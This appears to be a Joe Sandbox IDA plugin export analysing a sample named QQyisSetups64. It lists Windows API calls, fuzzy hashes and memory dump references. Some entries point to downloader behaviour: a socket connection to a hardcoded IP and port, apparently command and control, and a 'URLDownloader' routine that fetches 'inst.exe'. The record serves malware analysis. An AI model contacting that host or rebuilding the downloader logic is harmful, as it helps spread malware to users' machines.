                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                      • Opcode ID: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
                                                                                                                                                                                                                      • Instruction ID: 0a3c688fa97bd66b33bde44f19f6c44622bf0dc03c57f15caf060906c92fb81b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45F062B4D1021DEBDB05DBB4CA8999EBBF4FF1D200B918696E412E7111E730EB64DB50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02871526
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0287152F
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0287153A
                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 02871541
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3231755760-0
                                                                                                                                                                                                                      • Opcode ID: 0d7c60a2ef05bffbce595573e6e262163d78959232fdd7494e8d52d076cdfd15
                                                                                                                                                                                                                      • Instruction ID: 4980016af1f69655e72f99868af42ae204db573405a571edd3281e81c481927a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d7c60a2ef05bffbce595573e6e262163d78959232fdd7494e8d52d076cdfd15
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6D012B1000114ABE7022FF0DD4CB593F29FB0C202F058200F30981022CB32D422CF51
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02871526
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0287152F
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0287153A
                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 02871541
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3231755760-0
                                                                                                                                                                                                                      • Opcode ID: b06f1e73e4fc9b3e9c8109c654ce749b3bdcd294ed5a62abbbf62953f21e2e11
                                                                                                                                                                                                                      • Instruction ID: c91bca8abe4cc31a3593bf64d34d242ed6c9426ffac9acabdf0b694d2cdf9089
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b06f1e73e4fc9b3e9c8109c654ce749b3bdcd294ed5a62abbbf62953f21e2e11
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4D0C9B1044114AFEB025BF0AD8CAAD3F25FB0C202F058304F34A81462C6728422CF11
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 02870EFD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                                                                      • Opcode ID: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                                                                      • Instruction ID: d98202a22532f577ecb4645af019a0a68f0e8506740e40155c68da1d17d8fa4f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EA149B9A10715CBEB1ACF58C8C579ABBB1FB48324F24C52AE429EB6A0D334D540CF50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 10010F26
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                                                                      • Opcode ID: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                                                                      • Instruction ID: 2823fa2859f74bead7cb2a3ff5e24ff6c926bc6ae68a0f7e2a3c8df160a01c34
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EBA1F7B1E11715CBEB1ACF54C8C169ABBF1FB48364F15C52AE819EB290D374DA808B90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtdllDefWindowProc_W.NTDLL(00000011,?,?,?), ref: 02861135
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: NtdllProc_Window
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4255912815-0
                                                                                                                                                                                                                      • Opcode ID: 107021637aa96cc5c1bd2a280f74957b00f7bc018f5350d6d5e6892ae08a1c1a
                                                                                                                                                                                                                      • Instruction ID: 856db20c47a496988a0d8a66210a93f0feb4fdd4e401a7462383dea50b9fbc9a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 107021637aa96cc5c1bd2a280f74957b00f7bc018f5350d6d5e6892ae08a1c1a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B621EB78A44209AFEB14CF94CC8ABFD7775EB48701F109059FA1AAA2D1D7B09540CB51
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                                                                                                                                      • Instruction ID: 634bfd2156d84de619274b3c3120b2bc194c5d1f1ca33c58dade77456779207e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2131AA7AA0834B8FC310DF18C48092AB3E5FF89218F1A496DE985D7312E330F959CB95
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 100100E3
                                                                                                                                                                                                                      • getaddrinfo.WS2_32(118.107.44.219,18852,?,00000000), ref: 1001012A
                                                                                                                                                                                                                      • WSACleanup.WS2_32 ref: 10010139
                                                                                                                                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10010141
                                                                                                                                                                                                                      • socket.WS2_32(?,?,?), ref: 10010182
                                                                                                                                                                                                                      • WSACleanup.WS2_32 ref: 10010196
                                                                                                                                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001019E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Cleanupexit$Startupgetaddrinfosocket
                                                                                                                                                                                                                      • String ID: 118.107.44.219$18852
                                                                                                                                                                                                                      • API String ID: 2357443324-3001398927
                                                                                                                                                                                                                      • Opcode ID: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                                                                      • Instruction ID: 5d8dd8f7e503384157f0d0037aa173dfcecf3f6c77ed8d91bfff33004e817cc6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC61F8B0A05225EFE704DFA8CD88B9D7BB5FB48311F108199F519AB2A0C774D980DB65
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE28
                                                                                                                                                                                                                      • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE4D
                                                                                                                                                                                                                      • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE76
                                                                                                                                                                                                                      • ?flags@ios_base@std@@QBEHXZ.MSVCP140(6EA14730), ref: 1000CEE5
                                                                                                                                                                                                                      • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000CF26
                                                                                                                                                                                                                      • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDXZ.MSVCP140 ref: 1000CF3A
                                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 1000CF4B
                                                                                                                                                                                                                      • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000CF9C
                                                                                                                                                                                                                      • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(1000464B,?,?), ref: 1000CFB4
                                                                                                                                                                                                                      • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000D010
                                                                                                                                                                                                                      • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDXZ.MSVCP140 ref: 1000D024
                                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 1000D035
                                                                                                                                                                                                                      • ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000), ref: 1000D088
                                                                                                                                                                                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000), ref: 1000D0DA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$?rdbuf@?$basic_ios@D@std@@@2@V?$basic_streambuf@$?fill@?$basic_ios@?sputc@?$basic_streambuf@$?flags@ios_base@std@@?setstate@?$basic_ios@?sputn@?$basic_streambuf@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4125389999-0
                                                                                                                                                                                                                      • Opcode ID: 59b01a8a1e4c3d00d3f06f912504ee37e6c2b8c400d0ac45f0271c315747a722
                                                                                                                                                                                                                      • Instruction ID: 9f71a8f020fe28d290ef7ad39ca2b4630c2ccf5d8ae75f0951f39d4c8cecbd13
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59b01a8a1e4c3d00d3f06f912504ee37e6c2b8c400d0ac45f0271c315747a722
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35B1C974D00259DFEB04CF94C895BADBBB1FF48344F208169E90AAB359CB34A985CF90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 028700BA
                                                                                                                                                                                                                      • getaddrinfo.WS2_32(100170B4,10013B50,?,00000000), ref: 02870101
                                                                                                                                                                                                                      • WSACleanup.WS2_32 ref: 02870110
                                                                                                                                                                                                                      • socket.WS2_32(?,?,?), ref: 02870159
                                                                                                                                                                                                                      • WSACleanup.WS2_32 ref: 0287016D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Cleanup$Startupgetaddrinfosocket
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2560534018-0
                                                                                                                                                                                                                      • Opcode ID: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                                                                      • Instruction ID: 21b0b0790c34189d8d3567152e655fbba220c72fba53aaa7af3dd52b19a4c61b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 456119B9905215EFE705DFA8CD88BAE7BB5FB08315F108199E509A72A0C734D940CF65
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • InternetOpenA.WININET(10012448,00000001,00000000,00000000,00000000), ref: 02861BA1
                                                                                                                                                                                                                      • InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 02861BBD
                                                                                                                                                                                                                      • HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 02861C04
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 02861C21
                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,00001000,?), ref: 02861C3C
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 02861CF2
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 02861D0F
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 02861D19
                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 02861D23
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 02861D32
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Internet$CloseHandleMessageOpenSend$FileHttpInfoParentQueryReadShowWindow
                                                                                                                                                                                                                      • String ID: inst.exe
                                                                                                                                                                                                                      • API String ID: 2293700532-606395854
                                                                                                                                                                                                                      • Opcode ID: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
                                                                                                                                                                                                                      • Instruction ID: 0a6ae5a8c0a7f2d22a216ee2994046773e4b3220c9abe0bb299dff6a22d92d4c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6512AB5D40218ABEB00DFA4CD89BAEB775FF49701F108608F605BA290D775AA90DF61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 02861829
                                                                                                                                                                                                                        • Part of subcall function 028615D7: SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 02861632
                                                                                                                                                                                                                        • Part of subcall function 028615D7: CoTaskMemFree.COMBASE(00000000), ref: 02861685
                                                                                                                                                                                                                      • RegisterClassW.USER32(?), ref: 02861984
                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 028619BF
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 028619CE
                                                                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 028619F5
                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 02861A03
                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 02861A0D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Message$Window$ClassCreateDispatchFolderFreeHandleKnownModulePathRegisterShowTaskTranslate
                                                                                                                                                                                                                      • String ID: URLDownloader$inst.exe
                                                                                                                                                                                                                      • API String ID: 1820083345-3182466430
                                                                                                                                                                                                                      • Opcode ID: ad90597b90d91a76d6bc916b8ac211ae3b74ff0302ccb105c1be54824f9a3ca4
                                                                                                                                                                                                                      • Instruction ID: e3fda98b27929b7e36c51eeb4c22022801b3c22077e2b015d9fcc42dfb17ba42
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad90597b90d91a76d6bc916b8ac211ae3b74ff0302ccb105c1be54824f9a3ca4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 165117B5D00258AFDB14DFA8CC44BEDBBB5FB58300F1081A9E609EB294EB755A44CF52
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __RTC_Initialize.LIBCMT ref: 10010CFE
                                                                                                                                                                                                                      • ___scrt_uninitialize_crt.LIBCMT ref: 10010D18
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2442719207-0
                                                                                                                                                                                                                      • Opcode ID: 649f4d9b7be6ac56b36da947fabe160b4803ea2d6c825da84b9566d7c5061089
                                                                                                                                                                                                                      • Instruction ID: 82a901a5c9dd6496ef150d4dfe0cb85e0fd21509eb0d390bdb30e226946f8a75
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 649f4d9b7be6ac56b36da947fabe160b4803ea2d6c825da84b9566d7c5061089
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD41BF76F00269EBDB20CF95DC41BAE3AB5FB40AA4F114919F8956F251C7B0ED818BD0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(10012398), ref: 02861152
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,100123AC), ref: 02861164
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,100123C0), ref: 02861178
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 028611D4
                                                                                                                                                                                                                      • RegisterClassW.USER32(?), ref: 028611E8
                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,100123D8,100123EC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0286120D
                                                                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 02861228
                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 02861236
                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 02861240
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Message$AddressProc$ClassCreateDispatchHandleLibraryLoadModuleRegisterTranslateWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3658383123-0
                                                                                                                                                                                                                      • Opcode ID: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
                                                                                                                                                                                                                      • Instruction ID: 8586ceb415dd2ea73de2acc4d2d2ff592ec1472dfa07cfd4ecab68f939b43347
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7431D4B4D40618AFEB14DFE5CD89BADBBB8FF48701F108119F60AAA290D7749694CF50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4D7
                                                                                                                                                                                                                      • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4E4
                                                                                                                                                                                                                      • ?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4EF
                                                                                                                                                                                                                      • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B50B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$?epptr@?$basic_streambuf@Pninc@?$basic_streambuf@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1504536088-3916222277
                                                                                                                                                                                                                      • Opcode ID: d5684b002ae4a391e6b99177807e7a6d2de76d4cb44b71006c1053045423b1f9
                                                                                                                                                                                                                      • Instruction ID: 9fd4f056ea7531655faf49f776dc9014e5164f0190cfa771b6f3da1c1fb63bf9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5684b002ae4a391e6b99177807e7a6d2de76d4cb44b71006c1053045423b1f9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 085173B5D00609EFEB05CFD4C885EEEBBB5EF04381F048199E901A7259DB35AE44CBA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B042
                                                                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B04F
                                                                                                                                                                                                                      • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B05A
                                                                                                                                                                                                                      • ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B067
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@Gninc@?$basic_streambuf@
